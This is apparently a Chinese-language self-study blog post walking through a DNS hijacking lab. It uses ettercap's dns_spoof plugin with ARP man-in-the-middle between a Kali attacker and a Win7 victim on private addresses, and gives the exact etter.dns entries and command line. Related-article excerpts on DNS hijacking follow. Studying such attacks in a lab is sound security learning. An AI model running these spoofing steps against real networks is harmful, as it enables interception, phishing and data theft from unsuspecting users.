linux 自學日記 DNS劫持

2021-08-21 15:09:42 字數 686 閱讀 7781

攻擊者     kali     ip:192.168.5.128

受迫者      win7     ip:192.168.5.129

首先配置ettercap

leafpad /etc/ettercap/etter.dns

*    a    192.168.5.128

*.com    a    192.168.5.128

*.cn    a    192.168.5.128

*.org    a    192.168.5.128

設定劫持後網頁模樣

leafpad /var/www/index.html

service apache2 start  

(啟動apache2 伺服器)

1、ettercap -g

(開啟ettercap )

選擇dns_spoof外掛程式

sniff eth0選項,開啟host list 搜尋host ,新增閘道器和相應的機器

機器加入到攻擊者1 網管加入到攻擊者2 然後選擇中間人攻擊arp

勾選sniff remote connections已達到監聽的目的。

start sniff  開始攻擊

2、ettercap -t -q -i eth0 -p dns_spoof -m arp /192.168.5.2/ /192.168.5.129/

DNS劫持 流量劫持,HTTP HTTPS劫持

dns劫持 dns劫持就是通過劫持了dns伺服器,通過某些手段取得某網域名稱的解析記錄控制權,進而修改此網域名稱的解析結果,導致對該網域名稱的訪問由原ip位址轉入到修改後的指定ip,其結果就是對特定的 不能訪問或訪問的是假 從而實現竊取資料或者破壞原有正常服務的目的。dns劫持通過篡改dns伺服器上...

dns劫持分析

最近在做dns解析,關注的重點在查詢網域名稱ns記錄上,異常日誌中捕獲到乙個網域名稱,dig查詢 查詢請求型別為ns,dig結果卻只有一條a記錄。出於好奇,查詢型別改為a型別 這個網域名稱dig 查詢 a記錄,返回一條結果,但是每次 dig下去結果都不大一樣。回到最開始的問題,請求型別為ns,dig...

DNS 劫持和DNS 汙染

dns 是domain name server 的簡稱。當然如果你搜尋到這篇文章,那麼我猜測你可能對dns也有一定的了解了。所以對dns的基本知識我就不在介紹了。舉個例子,說到劫持,我們可能聯想到乙個壞蛋劫持了dns伺服器,拿著刀架在脖子上。這時候你問dns伺服器,博主帥嗎?發出請求 dns伺服器聽...